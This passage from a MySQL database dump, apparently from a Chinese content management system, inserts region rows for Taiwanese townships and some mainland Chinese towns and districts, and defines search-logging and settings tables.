INSERT INTO `ey_region` VALUES ('47624', '梅山乡', '3', '47533', 'M');
INSERT INTO `ey_region` VALUES ('47625', '民雄乡', '3', '47533', 'M');
INSERT INTO `ey_region` VALUES ('47626', '朴子市', '3', '47533', 'P');
INSERT INTO `ey_region` VALUES ('47627', '水上乡', '3', '47533', 'S');
INSERT INTO `ey_region` VALUES ('47628', '太保市', '3', '47533', 'T');
INSERT INTO `ey_region` VALUES ('47629', '溪口乡', '3', '47533', 'X');
INSERT INTO `ey_region` VALUES ('47630', '新港乡', '3', '47533', 'X');
INSERT INTO `ey_region` VALUES ('47631', '义竹乡', '3', '47533', 'Y');
INSERT INTO `ey_region` VALUES ('47632', '中埔乡', '3', '47533', 'Z');
INSERT INTO `ey_region` VALUES ('47633', '竹崎乡', '3', '47533', 'Z');
INSERT INTO `ey_region` VALUES ('47634', '金城镇', '3', '47534', 'J');
INSERT INTO `ey_region` VALUES ('47635', '金湖镇', '3', '47534', 'J');
INSERT INTO `ey_region` VALUES ('47636', '金宁乡', '3', '47534', 'J');
INSERT INTO `ey_region` VALUES ('47637', '金沙镇', '3', '47534', 'J');
INSERT INTO `ey_region` VALUES ('47638', '烈屿乡', '3', '47534', 'L');
INSERT INTO `ey_region` VALUES ('47639', '乌邱乡', '3', '47534', 'W');
INSERT INTO `ey_region` VALUES ('47640', '北竿乡', '3', '47535', 'B');
INSERT INTO `ey_region` VALUES ('47641', '东引乡', '3', '47535', 'D');
INSERT INTO `ey_region` VALUES ('47642', '莒光乡', '3', '47535', 'J');
INSERT INTO `ey_region` VALUES ('47643', '南竿乡', '3', '47535', 'N');
INSERT INTO `ey_region` VALUES ('47644', '大湖乡', '3', '47536', 'D');
INSERT INTO `ey_region` VALUES ('47645', '公馆乡', '3', '47536', 'G');
INSERT INTO `ey_region` VALUES ('47646', '后龙镇', '3', '47536', 'H');
INSERT INTO `ey_region` VALUES ('47647', '苗栗市', '3', '47536', 'M');
INSERT INTO `ey_region` VALUES ('47648', '南庄乡', '3', '47536', 'N');
INSERT INTO `ey_region` VALUES ('47649', '三湾乡', '3', '47536', 'S');
INSERT INTO `ey_region` VALUES ('47650', '三义乡', '3', '47536', 'S');
INSERT INTO `ey_region` VALUES ('47651', '狮潭乡', '3', '47536', 'S');
INSERT INTO `ey_region` VALUES ('47652', '泰安乡', '3', '47536', 'T');
INSERT INTO `ey_region` VALUES ('47653', '铜锣乡', '3', '47536', 'T');
INSERT INTO `ey_region` VALUES ('47654', '通宵镇', '3', '47536', 'T');
INSERT INTO `ey_region` VALUES ('47655', '头份镇', '3', '47536', 'T');
INSERT INTO `ey_region` VALUES ('47656', '头屋乡', '3', '47536', 'T');
INSERT INTO `ey_region` VALUES ('47657', '西湖乡', '3', '47536', 'X');
INSERT INTO `ey_region` VALUES ('47658', '苑里镇', '3', '47536', 'Y');
INSERT INTO `ey_region` VALUES ('47659', '造桥乡', '3', '47536', 'Z');
INSERT INTO `ey_region` VALUES ('47660', '竹南镇', '3', '47536', 'Z');
INSERT INTO `ey_region` VALUES ('47661', '卓兰镇', '3', '47536', 'Z');
INSERT INTO `ey_region` VALUES ('47662', '草屯镇', '3', '47537', 'C');
INSERT INTO `ey_region` VALUES ('47663', '国姓乡', '3', '47537', 'G');
INSERT INTO `ey_region` VALUES ('47664', '集集镇', '3', '47537', 'J');
INSERT INTO `ey_region` VALUES ('47665', '鹿谷乡', '3', '47537', 'L');
INSERT INTO `ey_region` VALUES ('47666', '名间乡', '3', '47537', 'M');
INSERT INTO `ey_region` VALUES ('47667', '南投市', '3', '47537', 'N');
INSERT INTO `ey_region` VALUES ('47668', '埔里镇', '3', '47537', 'P');
INSERT INTO `ey_region` VALUES ('47669', '仁爱乡', '3', '47537', 'R');
INSERT INTO `ey_region` VALUES ('47670', '水里乡', '3', '47537', 'S');
INSERT INTO `ey_region` VALUES ('47671', '信义乡', '3', '47537', 'X');
INSERT INTO `ey_region` VALUES ('47672', '鱼池乡', '3', '47537', 'Y');
INSERT INTO `ey_region` VALUES ('47673', '中寮乡', '3', '47537', 'Z');
INSERT INTO `ey_region` VALUES ('47674', '竹山镇', '3', '47537', 'Z');
INSERT INTO `ey_region` VALUES ('47675', '白沙乡', '3', '47538', 'B');
INSERT INTO `ey_region` VALUES ('47676', '湖西乡', '3', '47538', 'H');
INSERT INTO `ey_region` VALUES ('47677', '马公市', '3', '47538', 'M');
INSERT INTO `ey_region` VALUES ('47678', '七美乡', '3', '47538', 'Q');
INSERT INTO `ey_region` VALUES ('47679', '望安乡', '3', '47538', 'W');
INSERT INTO `ey_region` VALUES ('47680', '西屿乡', '3', '47538', 'X');
INSERT INTO `ey_region` VALUES ('47681', '长治乡', '3', '47539', 'C');
INSERT INTO `ey_region` VALUES ('47682', '潮州镇', '3', '47539', 'C');
INSERT INTO `ey_region` VALUES ('47683', '车城乡', '3', '47539', 'C');
INSERT INTO `ey_region` VALUES ('47684', '春日乡', '3', '47539', 'C');
INSERT INTO `ey_region` VALUES ('47685', '东港镇', '3', '47539', 'D');
INSERT INTO `ey_region` VALUES ('47686', '枋寮乡', '3', '47539', 'F');
INSERT INTO `ey_region` VALUES ('47687', '枋山乡', '3', '47539', 'F');
INSERT INTO `ey_region` VALUES ('47688', '高树乡', '3', '47539', 'G');
INSERT INTO `ey_region` VALUES ('47689', '恒春镇', '3', '47539', 'H');
INSERT INTO `ey_region` VALUES ('47690', '佳冬乡', '3', '47539', 'J');
INSERT INTO `ey_region` VALUES ('47691', '九如乡', '3', '47539', 'J');
INSERT INTO `ey_region` VALUES ('47692', '崁顶乡', '3', '47539', 'K');
INSERT INTO `ey_region` VALUES ('47693', '来义乡', '3', '47539', 'L');
INSERT INTO `ey_region` VALUES ('47694', '里港乡', '3', '47539', 'L');
INSERT INTO `ey_region` VALUES ('47695', '林边乡', '3', '47539', 'L');
INSERT INTO `ey_region` VALUES ('47696', '麟洛乡', '3', '47539', 'L');
INSERT INTO `ey_region` VALUES ('47697', '琉球乡', '3', '47539', 'L');
INSERT INTO `ey_region` VALUES ('47698', '玛家乡', '3', '47539', 'M');
INSERT INTO `ey_region` VALUES ('47699', '满州乡', '3', '47539', 'M');
INSERT INTO `ey_region` VALUES ('47700', '牡丹乡', '3', '47539', 'M');
INSERT INTO `ey_region` VALUES ('47701', '南州乡', '3', '47539', 'N');
INSERT INTO `ey_region` VALUES ('47702', '内埔乡', '3', '47539', 'N');
INSERT INTO `ey_region` VALUES ('47703', '屏东市', '3', '47539', 'P');
INSERT INTO `ey_region` VALUES ('47704', '三地门乡', '3', '47539', 'S');
INSERT INTO `ey_region` VALUES ('47705', '狮子乡', '3', '47539', 'S');
INSERT INTO `ey_region` VALUES ('47706', '泰武乡', '3', '47539', 'T');
INSERT INTO `ey_region` VALUES ('47707', '万丹乡', '3', '47539', 'W');
INSERT INTO `ey_region` VALUES ('47708', '万峦乡', '3', '47539', 'W');
INSERT INTO `ey_region` VALUES ('47709', '雾台乡', '3', '47539', 'W');
INSERT INTO `ey_region` VALUES ('47710', '新埤乡', '3', '47539', 'X');
INSERT INTO `ey_region` VALUES ('47711', '新园乡', '3', '47539', 'X');
INSERT INTO `ey_region` VALUES ('47712', '盐埔乡', '3', '47539', 'Y');
INSERT INTO `ey_region` VALUES ('47713', '竹田乡', '3', '47539', 'Z');
INSERT INTO `ey_region` VALUES ('47714', '北投区', '3', '47540', 'B');
INSERT INTO `ey_region` VALUES ('47715', '大安区', '3', '47540', 'D');
INSERT INTO `ey_region` VALUES ('47716', '大同区', '3', '47540', 'D');
INSERT INTO `ey_region` VALUES ('47717', '南港区', '3', '47540', 'N');
INSERT INTO `ey_region` VALUES ('47718', '内湖区', '3', '47540', 'N');
INSERT INTO `ey_region` VALUES ('47719', '士林区', '3', '47540', 'S');
INSERT INTO `ey_region` VALUES ('47720', '松山区', '3', '47540', 'S');
INSERT INTO `ey_region` VALUES ('47721', '万华区', '3', '47540', 'W');
INSERT INTO `ey_region` VALUES ('47722', '文山区', '3', '47540', 'W');
INSERT INTO `ey_region` VALUES ('47723', '信义区', '3', '47540', 'X');
INSERT INTO `ey_region` VALUES ('47724', '中山区', '3', '47540', 'Z');
INSERT INTO `ey_region` VALUES ('47725', '中正区', '3', '47540', 'Z');
INSERT INTO `ey_region` VALUES ('47726', '其它区', '3', '47540', 'Q');
INSERT INTO `ey_region` VALUES ('47727', '卑南乡', '3', '47541', 'B');
INSERT INTO `ey_region` VALUES ('47728', '长滨乡', '3', '47541', 'C');
INSERT INTO `ey_region` VALUES ('47729', '成功镇', '3', '47541', 'C');
INSERT INTO `ey_region` VALUES ('47730', '池上乡', '3', '47541', 'C');
INSERT INTO `ey_region` VALUES ('47731', '达仁乡', '3', '47541', 'D');
INSERT INTO `ey_region` VALUES ('47732', '大武乡', '3', '47541', 'D');
INSERT INTO `ey_region` VALUES ('47733', '东河乡', '3', '47541', 'D');
INSERT INTO `ey_region` VALUES ('47734', '关山镇', '3', '47541', 'G');
INSERT INTO `ey_region` VALUES ('47735', '海端乡', '3', '47541', 'H');
INSERT INTO `ey_region` VALUES ('47736', '金峰乡', '3', '47541', 'J');
INSERT INTO `ey_region` VALUES ('47737', '兰屿乡', '3', '47541', 'L');
INSERT INTO `ey_region` VALUES ('47738', '鹿野乡', '3', '47541', 'L');
INSERT INTO `ey_region` VALUES ('47739', '绿岛乡', '3', '47541', 'L');
INSERT INTO `ey_region` VALUES ('47740', '台东市', '3', '47541', 'T');
INSERT INTO `ey_region` VALUES ('47741', '太麻里乡', '3', '47541', 'T');
INSERT INTO `ey_region` VALUES ('47742', '延平乡', '3', '47541', 'Y');
INSERT INTO `ey_region` VALUES ('47743', '中西区', '3', '47542', 'Z');
INSERT INTO `ey_region` VALUES ('47744', '东区', '3', '47542', 'D');
INSERT INTO `ey_region` VALUES ('47745', '南区', '3', '47542', 'N');
INSERT INTO `ey_region` VALUES ('47746', '北区', '3', '47542', 'B');
INSERT INTO `ey_region` VALUES ('47747', '安平区', '3', '47542', 'A');
INSERT INTO `ey_region` VALUES ('47748', '安南区', '3', '47542', 'A');
INSERT INTO `ey_region` VALUES ('47749', '其它区', '3', '47542', 'Q');
INSERT INTO `ey_region` VALUES ('47750', '永康区', '3', '47542', 'Y');
INSERT INTO `ey_region` VALUES ('47751', '归仁区', '3', '47542', 'G');
INSERT INTO `ey_region` VALUES ('47752', '新化区', '3', '47542', 'X');
INSERT INTO `ey_region` VALUES ('47753', '左镇区', '3', '47542', 'Z');
INSERT INTO `ey_region` VALUES ('47754', '玉井区', '3', '47542', 'Y');
INSERT INTO `ey_region` VALUES ('47755', '楠西区', '3', '47542', 'N');
INSERT INTO `ey_region` VALUES ('47756', '南化区', '3', '47542', 'N');
INSERT INTO `ey_region` VALUES ('47757', '仁德区', '3', '47542', 'R');
INSERT INTO `ey_region` VALUES ('47758', '关庙区', '3', '47542', 'G');
INSERT INTO `ey_region` VALUES ('47759', '龙崎区', '3', '47542', 'L');
INSERT INTO `ey_region` VALUES ('47760', '官田区', '3', '47542', 'G');
INSERT INTO `ey_region` VALUES ('47761', '麻豆区', '3', '47542', 'M');
INSERT INTO `ey_region` VALUES ('47762', '佳里区', '3', '47542', 'J');
INSERT INTO `ey_region` VALUES ('47763', '西港区', '3', '47542', 'X');
INSERT INTO `ey_region` VALUES ('47764', '七股区', '3', '47542', 'Q');
INSERT INTO `ey_region` VALUES ('47765', '将军区', '3', '47542', 'J');
INSERT INTO `ey_region` VALUES ('47766', '学甲区', '3', '47542', 'X');
INSERT INTO `ey_region` VALUES ('47767', '北门区', '3', '47542', 'B');
INSERT INTO `ey_region` VALUES ('47768', '新营区', '3', '47542', 'X');
INSERT INTO `ey_region` VALUES ('47769', '后壁区', '3', '47542', 'H');
INSERT INTO `ey_region` VALUES ('47770', '白河区', '3', '47542', 'B');
INSERT INTO `ey_region` VALUES ('47771', '东山区', '3', '47542', 'D');
INSERT INTO `ey_region` VALUES ('47772', '六甲区', '3', '47542', 'L');
INSERT INTO `ey_region` VALUES ('47773', '下营区', '3', '47542', 'X');
INSERT INTO `ey_region` VALUES ('47774', '柳营区', '3', '47542', 'L');
INSERT INTO `ey_region` VALUES ('47775', '盐水区', '3', '47542', 'Y');
INSERT INTO `ey_region` VALUES ('47776', '善化区', '3', '47542', 'S');
INSERT INTO `ey_region` VALUES ('47777', '大内区', '3', '47542', 'D');
INSERT INTO `ey_region` VALUES ('47778', '山上区', '3', '47542', 'S');
INSERT INTO `ey_region` VALUES ('47779', '新市区', '3', '47542', 'X');
INSERT INTO `ey_region` VALUES ('47780', '安定区', '3', '47542', 'A');
INSERT INTO `ey_region` VALUES ('47781', '中区', '3', '47543', 'Z');
INSERT INTO `ey_region` VALUES ('47782', '东区', '3', '47543', 'D');
INSERT INTO `ey_region` VALUES ('47783', '南区', '3', '47543', 'N');
INSERT INTO `ey_region` VALUES ('47784', '西区', '3', '47543', 'X');
INSERT INTO `ey_region` VALUES ('47785', '北区', '3', '47543', 'B');
INSERT INTO `ey_region` VALUES ('47786', '北屯区', '3', '47543', 'B');
INSERT INTO `ey_region` VALUES ('47787', '西屯区', '3', '47543', 'X');
INSERT INTO `ey_region` VALUES ('47788', '南屯区', '3', '47543', 'N');
INSERT INTO `ey_region` VALUES ('47789', '其它区', '3', '47543', 'Q');
INSERT INTO `ey_region` VALUES ('47790', '太平区', '3', '47543', 'T');
INSERT INTO `ey_region` VALUES ('47791', '大里区', '3', '47543', 'D');
INSERT INTO `ey_region` VALUES ('47792', '雾峰区', '3', '47543', 'W');
INSERT INTO `ey_region` VALUES ('47793', '乌日区', '3', '47543', 'W');
INSERT INTO `ey_region` VALUES ('47794', '丰原区', '3', '47543', 'F');
INSERT INTO `ey_region` VALUES ('47795', '后里区', '3', '47543', 'H');
INSERT INTO `ey_region` VALUES ('47796', '石冈区', '3', '47543', 'S');
INSERT INTO `ey_region` VALUES ('47797', '东势区', '3', '47543', 'D');
INSERT INTO `ey_region` VALUES ('47798', '和平区', '3', '47543', 'H');
INSERT INTO `ey_region` VALUES ('47799', '新社区', '3', '47543', 'X');
INSERT INTO `ey_region` VALUES ('47800', '潭子区', '3', '47543', 'T');
INSERT INTO `ey_region` VALUES ('47801', '大雅区', '3', '47543', 'D');
INSERT INTO `ey_region` VALUES ('47802', '神冈区', '3', '47543', 'S');
INSERT INTO `ey_region` VALUES ('47803', '大肚区', '3', '47543', 'D');
INSERT INTO `ey_region` VALUES ('47804', '沙鹿区', '3', '47543', 'S');
INSERT INTO `ey_region` VALUES ('47805', '龙井区', '3', '47543', 'L');
INSERT INTO `ey_region` VALUES ('47806', '梧栖区', '3', '47543', 'W');
INSERT INTO `ey_region` VALUES ('47807', '清水区', '3', '47543', 'Q');
INSERT INTO `ey_region` VALUES ('47808', '大甲区', '3', '47543', 'D');
INSERT INTO `ey_region` VALUES ('47809', '外埔区', '3', '47543', 'W');
INSERT INTO `ey_region` VALUES ('47810', '大安区', '3', '47543', 'D');
INSERT INTO `ey_region` VALUES ('47811', '中坜区', '3', '47544', 'Z');
INSERT INTO `ey_region` VALUES ('47812', '平镇区', '3', '47544', 'P');
INSERT INTO `ey_region` VALUES ('47813', '龙潭区', '3', '47544', 'L');
INSERT INTO `ey_region` VALUES ('47814', '杨梅区', '3', '47544', 'Y');
INSERT INTO `ey_region` VALUES ('47815', '新屋区', '3', '47544', 'X');
INSERT INTO `ey_region` VALUES ('47816', '观音区', '3', '47544', 'G');
INSERT INTO `ey_region` VALUES ('47817', '桃园区', '3', '47544', 'T');
INSERT INTO `ey_region` VALUES ('47818', '龟山区', '3', '47544', 'G');
INSERT INTO `ey_region` VALUES ('47819', '八德区', '3', '47544', 'B');
INSERT INTO `ey_region` VALUES ('47820', '大溪区', '3', '47544', 'D');
INSERT INTO `ey_region` VALUES ('47821', '复兴区', '3', '47544', 'F');
INSERT INTO `ey_region` VALUES ('47822', '大园区', '3', '47544', 'D');
INSERT INTO `ey_region` VALUES ('47823', '芦竹区', '3', '47544', 'L');
INSERT INTO `ey_region` VALUES ('47824', '万里区', '3', '47545', 'W');
INSERT INTO `ey_region` VALUES ('47825', '金山区', '3', '47545', 'J');
INSERT INTO `ey_region` VALUES ('47826', '板桥区', '3', '47545', 'B');
INSERT INTO `ey_region` VALUES ('47827', '汐止区', '3', '47545', 'X');
INSERT INTO `ey_region` VALUES ('47828', '深坑区', '3', '47545', 'S');
INSERT INTO `ey_region` VALUES ('47829', '石碇区', '3', '47545', 'S');
INSERT INTO `ey_region` VALUES ('47830', '瑞芳区', '3', '47545', 'R');
INSERT INTO `ey_region` VALUES ('47831', '平溪区', '3', '47545', 'P');
INSERT INTO `ey_region` VALUES ('47832', '双溪区', '3', '47545', 'S');
INSERT INTO `ey_region` VALUES ('47833', '贡寮区', '3', '47545', 'G');
INSERT INTO `ey_region` VALUES ('47834', '新店区', '3', '47545', 'X');
INSERT INTO `ey_region` VALUES ('47835', '坪林区', '3', '47545', 'P');
INSERT INTO `ey_region` VALUES ('47836', '乌来区', '3', '47545', 'W');
INSERT INTO `ey_region` VALUES ('47837', '永和区', '3', '47545', 'Y');
INSERT INTO `ey_region` VALUES ('47838', '中和区', '3', '47545', 'Z');
INSERT INTO `ey_region` VALUES ('47839', '土城区', '3', '47545', 'T');
INSERT INTO `ey_region` VALUES ('47840', '三峡区', '3', '47545', 'S');
INSERT INTO `ey_region` VALUES ('47841', '树林区', '3', '47545', 'S');
INSERT INTO `ey_region` VALUES ('47842', '莺歌区', '3', '47545', 'Y');
INSERT INTO `ey_region` VALUES ('47843', '三重区', '3', '47545', 'S');
INSERT INTO `ey_region` VALUES ('47844', '新庄区', '3', '47545', 'X');
INSERT INTO `ey_region` VALUES ('47845', '泰山区', '3', '47545', 'T');
INSERT INTO `ey_region` VALUES ('47846', '林口区', '3', '47545', 'L');
INSERT INTO `ey_region` VALUES ('47847', '芦洲区', '3', '47545', 'L');
INSERT INTO `ey_region` VALUES ('47848', '五股区', '3', '47545', 'W');
INSERT INTO `ey_region` VALUES ('47849', '八里区', '3', '47545', 'B');
INSERT INTO `ey_region` VALUES ('47850', '淡水区', '3', '47545', 'D');
INSERT INTO `ey_region` VALUES ('47851', '三芝区', '3', '47545', 'S');
INSERT INTO `ey_region` VALUES ('47852', '石门区', '3', '47545', 'S');
INSERT INTO `ey_region` VALUES ('47853', '东区', '3', '47546', 'D');
INSERT INTO `ey_region` VALUES ('47854', '北区', '3', '47546', 'B');
INSERT INTO `ey_region` VALUES ('47855', '香山区', '3', '47546', 'X');
INSERT INTO `ey_region` VALUES ('47856', '其它区', '3', '47546', 'Q');
INSERT INTO `ey_region` VALUES ('47857', '竹北市', '3', '47547', 'Z');
INSERT INTO `ey_region` VALUES ('47858', '湖口乡', '3', '47547', 'H');
INSERT INTO `ey_region` VALUES ('47859', '新丰乡', '3', '47547', 'X');
INSERT INTO `ey_region` VALUES ('47860', '新埔镇', '3', '47547', 'X');
INSERT INTO `ey_region` VALUES ('47861', '关西镇', '3', '47547', 'G');
INSERT INTO `ey_region` VALUES ('47862', '芎林乡', '3', '47547', 'X');
INSERT INTO `ey_region` VALUES ('47863', '宝山乡', '3', '47547', 'B');
INSERT INTO `ey_region` VALUES ('47864', '竹东镇', '3', '47547', 'Z');
INSERT INTO `ey_region` VALUES ('47865', '五峰乡', '3', '47547', 'W');
INSERT INTO `ey_region` VALUES ('47866', '横山乡', '3', '47547', 'H');
INSERT INTO `ey_region` VALUES ('47867', '尖石乡', '3', '47547', 'J');
INSERT INTO `ey_region` VALUES ('47868', '北埔乡', '3', '47547', 'B');
INSERT INTO `ey_region` VALUES ('47869', '峨眉乡', '3', '47547', 'E');
INSERT INTO `ey_region` VALUES ('47870', '宜兰市', '3', '47548', 'Y');
INSERT INTO `ey_region` VALUES ('47871', '头城镇', '3', '47548', 'T');
INSERT INTO `ey_region` VALUES ('47872', '礁溪乡', '3', '47548', 'J');
INSERT INTO `ey_region` VALUES ('47873', '壮围乡', '3', '47548', 'Z');
INSERT INTO `ey_region` VALUES ('47874', '员山乡', '3', '47548', 'Y');
INSERT INTO `ey_region` VALUES ('47875', '罗东镇', '3', '47548', 'L');
INSERT INTO `ey_region` VALUES ('47876', '三星乡', '3', '47548', 'S');
INSERT INTO `ey_region` VALUES ('47877', '大同乡', '3', '47548', 'D');
INSERT INTO `ey_region` VALUES ('47878', '五结乡', '3', '47548', 'W');
INSERT INTO `ey_region` VALUES ('47879', '冬山乡', '3', '47548', 'D');
INSERT INTO `ey_region` VALUES ('47880', '苏澳镇', '3', '47548', 'S');
INSERT INTO `ey_region` VALUES ('47881', '南澳乡', '3', '47548', 'N');
INSERT INTO `ey_region` VALUES ('47882', '钓鱼台', '3', '47548', 'D');
INSERT INTO `ey_region` VALUES ('47883', '斗南镇', '3', '47549', 'D');
INSERT INTO `ey_region` VALUES ('47884', '大埤乡', '3', '47549', 'D');
INSERT INTO `ey_region` VALUES ('47885', '虎尾镇', '3', '47549', 'H');
INSERT INTO `ey_region` VALUES ('47886', '土库镇', '3', '47549', 'T');
INSERT INTO `ey_region` VALUES ('47887', '褒忠乡', '3', '47549', 'B');
INSERT INTO `ey_region` VALUES ('47888', '东势乡', '3', '47549', 'D');
INSERT INTO `ey_region` VALUES ('47889', '台西乡', '3', '47549', 'T');
INSERT INTO `ey_region` VALUES ('47890', '仑背乡', '3', '47549', 'L');
INSERT INTO `ey_region` VALUES ('47891', '麦寮乡', '3', '47549', 'M');
INSERT INTO `ey_region` VALUES ('47892', '斗六市', '3', '47549', 'D');
INSERT INTO `ey_region` VALUES ('47893', '林内乡', '3', '47549', 'L');
INSERT INTO `ey_region` VALUES ('47894', '古坑乡', '3', '47549', 'G');
INSERT INTO `ey_region` VALUES ('47895', '莿桐乡', '3', '47549', 'C');
INSERT INTO `ey_region` VALUES ('47896', '西螺镇', '3', '47549', 'X');
INSERT INTO `ey_region` VALUES ('47897', '二仑乡', '3', '47549', 'E');
INSERT INTO `ey_region` VALUES ('47898', '北港镇', '3', '47549', 'B');
INSERT INTO `ey_region` VALUES ('47899', '水林乡', '3', '47549', 'S');
INSERT INTO `ey_region` VALUES ('47900', '口湖乡', '3', '47549', 'K');
INSERT INTO `ey_region` VALUES ('47901', '四湖乡', '3', '47549', 'S');
INSERT INTO `ey_region` VALUES ('47902', '元长乡', '3', '47549', 'Y');
INSERT INTO `ey_region` VALUES ('47903', '彰化市', '3', '47550', 'Z');
INSERT INTO `ey_region` VALUES ('47904', '芬园乡', '3', '47550', 'F');
INSERT INTO `ey_region` VALUES ('47905', '花坛乡', '3', '47550', 'H');
INSERT INTO `ey_region` VALUES ('47906', '秀水乡', '3', '47550', 'X');
INSERT INTO `ey_region` VALUES ('47907', '鹿港镇', '3', '47550', 'L');
INSERT INTO `ey_region` VALUES ('47908', '福兴乡', '3', '47550', 'F');
INSERT INTO `ey_region` VALUES ('47909', '线西乡', '3', '47550', 'X');
INSERT INTO `ey_region` VALUES ('47910', '和美镇', '3', '47550', 'H');
INSERT INTO `ey_region` VALUES ('47911', '伸港乡', '3', '47550', 'S');
INSERT INTO `ey_region` VALUES ('47912', '员林镇', '3', '47550', 'Y');
INSERT INTO `ey_region` VALUES ('47913', '社头乡', '3', '47550', 'S');
INSERT INTO `ey_region` VALUES ('47914', '永靖乡', '3', '47550', 'Y');
INSERT INTO `ey_region` VALUES ('47915', '埔心乡', '3', '47550', 'P');
INSERT INTO `ey_region` VALUES ('47916', '溪湖镇', '3', '47550', 'X');
INSERT INTO `ey_region` VALUES ('47917', '大村乡', '3', '47550', 'D');
INSERT INTO `ey_region` VALUES ('47918', '埔盐乡', '3', '47550', 'P');
INSERT INTO `ey_region` VALUES ('47919', '田中镇', '3', '47550', 'T');
INSERT INTO `ey_region` VALUES ('47920', '北斗镇', '3', '47550', 'B');
INSERT INTO `ey_region` VALUES ('47921', '田尾乡', '3', '47550', 'T');
INSERT INTO `ey_region` VALUES ('47922', '埤头乡', '3', '47550', 'P');
INSERT INTO `ey_region` VALUES ('47923', '溪州乡', '3', '47550', 'X');
INSERT INTO `ey_region` VALUES ('47924', '竹塘乡', '3', '47550', 'Z');
INSERT INTO `ey_region` VALUES ('47925', '二林镇', '3', '47550', 'E');
INSERT INTO `ey_region` VALUES ('47926', '大城乡', '3', '47550', 'D');
INSERT INTO `ey_region` VALUES ('47927', '芳苑乡', '3', '47550', 'F');
INSERT INTO `ey_region` VALUES ('47928', '二水乡', '3', '47550', 'E');
INSERT INTO `ey_region` VALUES ('47929', '莲池区', '3', '1772', 'L');
INSERT INTO `ey_region` VALUES ('47930', '竞秀区', '3', '1772', 'J');
INSERT INTO `ey_region` VALUES ('47931', '常平镇', '3', '29855', 'C');
INSERT INTO `ey_region` VALUES ('47932', '茶山镇', '3', '29855', 'C');
INSERT INTO `ey_region` VALUES ('47933', '大朗镇', '3', '29855', 'D');
INSERT INTO `ey_region` VALUES ('47934', '大岭山镇', '3', '29855', 'D');
INSERT INTO `ey_region` VALUES ('47935', '道滘镇', '3', '29855', 'D');
INSERT INTO `ey_region` VALUES ('47936', '东城街道', '3', '29855', 'D');
INSERT INTO `ey_region` VALUES ('47937', '东坑镇', '3', '29855', 'D');
INSERT INTO `ey_region` VALUES ('47938', '凤岗镇', '3', '29855', 'F');
INSERT INTO `ey_region` VALUES ('47939', '高埗镇', '3', '29855', 'G');
INSERT INTO `ey_region` VALUES ('47940', '莞城街道', '3', '29855', 'G');
INSERT INTO `ey_region` VALUES ('47941', '横沥镇', '3', '29855', 'H');
INSERT INTO `ey_region` VALUES ('47942', '洪梅镇', '3', '29855', 'H');
INSERT INTO `ey_region` VALUES ('47943', '厚街镇', '3', '29855', 'H');
INSERT INTO `ey_region` VALUES ('47944', '黄江镇', '3', '29855', 'H');
INSERT INTO `ey_region` VALUES ('47945', '虎门镇', '3', '29855', 'H');
INSERT INTO `ey_region` VALUES ('47946', '寮步镇', '3', '29855', 'L');
INSERT INTO `ey_region` VALUES ('47947', '麻涌镇', '3', '29855', 'M');
INSERT INTO `ey_region` VALUES ('47948', '南城街道', '3', '29855', 'N');
INSERT INTO `ey_region` VALUES ('47949', '桥头镇', '3', '29855', 'Q');
INSERT INTO `ey_region` VALUES ('47950', '清溪镇', '3', '29855', 'Q');
INSERT INTO `ey_region` VALUES ('47951', '企石镇', '3', '29855', 'Q');
INSERT INTO `ey_region` VALUES ('47952', '沙田镇', '3', '29855', 'S');
INSERT INTO `ey_region` VALUES ('47953', '石碣镇', '3', '29855', 'S');
INSERT INTO `ey_region` VALUES ('47954', '石龙镇', '3', '29855', 'S');
INSERT INTO `ey_region` VALUES ('47955', '石排镇', '3', '29855', 'S');
INSERT INTO `ey_region` VALUES ('47956', '松山湖管委会', '3', '29855', 'S');
INSERT INTO `ey_region` VALUES ('47957', '塘厦镇', '3', '29855', 'T');
INSERT INTO `ey_region` VALUES ('47958', '望牛墩镇', '3', '29855', 'W');
INSERT INTO `ey_region` VALUES ('47959', '万江街道', '3', '29855', 'W');
INSERT INTO `ey_region` VALUES ('47960', '谢岗镇', '3', '29855', 'X');
INSERT INTO `ey_region` VALUES ('47961', '长安镇', '3', '29855', 'Z');
INSERT INTO `ey_region` VALUES ('47962', '樟木头镇', '3', '29855', 'Z');
INSERT INTO `ey_region` VALUES ('47963', '中堂镇', '3', '29855', 'Z');
INSERT INTO `ey_region` VALUES ('47965', '吉阳区', '3', '31618', 'J');
INSERT INTO `ey_region` VALUES ('47966', '天涯区', '3', '31618', 'T');
INSERT INTO `ey_region` VALUES ('47967', '崖州区', '3', '31618', 'Y');
INSERT INTO `ey_region` VALUES ('47968', '海外', '1', '0', 'H');
INSERT INTO `ey_region` VALUES ('47969', '海外', '2', '47968', 'H');
INSERT INTO `ey_region` VALUES ('47970', '海外', '3', '47969', 'H');
-- -----------------------------
-- Table structure for `ey_search_locking`
-- -----------------------------
DROP TABLE IF EXISTS `ey_search_locking`;
CREATE TABLE `ey_search_locking` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`users_id` int(10) DEFAULT '0' COMMENT '用户ID',
`ip` varchar(20) DEFAULT '' COMMENT 'ip',
`locking_time` int(11) DEFAULT '0' COMMENT '锁定时间',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='搜索记录锁定表';
-- -----------------------------
-- Table structure for `ey_search_word`
-- -----------------------------
DROP TABLE IF EXISTS `ey_search_word`;
CREATE TABLE `ey_search_word` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`word` varchar(255) DEFAULT '' COMMENT '关键词',
`searchNum` int(10) DEFAULT '1' COMMENT '搜索次数',
`resultNum` int(10) DEFAULT '0' COMMENT '搜索结果数量',
`sort_order` int(10) DEFAULT '0' COMMENT '排序号',
`users_id` int(11) DEFAULT '0' COMMENT '用户id',
`ip` varchar(20) DEFAULT '' COMMENT 'ip',
`is_hot` tinyint(1) DEFAULT '0' COMMENT '是否热搜',
`lang` varchar(30) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `word` (`word`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='搜索词统计表';
-- -----------------------------
-- Table structure for `ey_setting`
-- -----------------------------
DROP TABLE IF EXISTS `ey_setting`;
CREATE TABLE `ey_setting` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`name` varchar(50) DEFAULT '' COMMENT '配置的key键名',
`value` text,
`inc_type` varchar(64) DEFAULT '' COMMENT '配置分组',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
